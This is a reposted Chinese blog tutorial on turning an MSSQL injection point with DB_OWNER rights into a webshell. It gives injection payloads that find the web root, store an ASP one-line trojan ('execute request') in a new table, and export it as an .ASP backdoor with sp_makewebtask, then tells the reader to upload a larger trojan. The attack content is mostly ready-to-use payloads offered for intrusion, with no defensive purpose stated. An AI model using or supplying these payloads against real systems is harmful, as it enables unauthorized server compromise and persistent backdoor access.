MSSQL下拿WEBSEHLL

MSSQL的注入是一种非常复杂和有效的入侵技术,其作用当然不仅仅只是通过注入点得到管理用的密

码,再用用密码登陆网站的管理后台这种比较笨的利用方法.当MSSQL注入点为DB-ONWER权限时,而同时数据库

和WEB是在同一台主机上, 满足这二个条件时,可能通过得到WEB路径,再将一字话木马写入一个表,再利用

MSSQL语句将其导出为一个脚本文件的方法得到一个后门,再上传大木马的方法得到WEBSEHLL.

第一步:确定网站的WEB路径,通过DIRTREE逐个查看硬盘及文件夹查找WEB目录 

第二步.得到WEB路径后,建一个表.字段类型为CHAR长度为255,这个表将来用作插入一句话木马,使用语句

;create table pcguest(pc char(255));--

第三步,将一句话木马插入表中,使用

;insert into pcguest(pc) values ('<%execute request("p")%>')--

其中<%execute request("p")%>就是一句话木马,但是由于是在链接地址提交的,所以涉及到字符转

换问题,将一句话木马中的< > % " 字符转换成unicode格式,,如修改后的一句话木马代码为

%3c%25execute request(%22p%22)%25%3e

完整的MSSQL语句为

;insert into pcguest(pc) values ('%3c%25execute request(%22p%22)%25%3e');--

第四步,将表导出为一个ASP的文件

;execute sp_makewebtask @outputfile='E:\Inetpub\wwwroot\PC.ASP',@query='select pc from pcguest';--

最后在网页上连接ASP一句话木马上传大马,即拿到WEBSEHLL

 

来源于 :B.B.S.T信息安全团队 www.hackbadboy.com

 


原文链接: http://blog.csdn.net/mypc2010/article/details/7983980

转载于:https://my.oschina.net/changpinghu/blog/92532

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值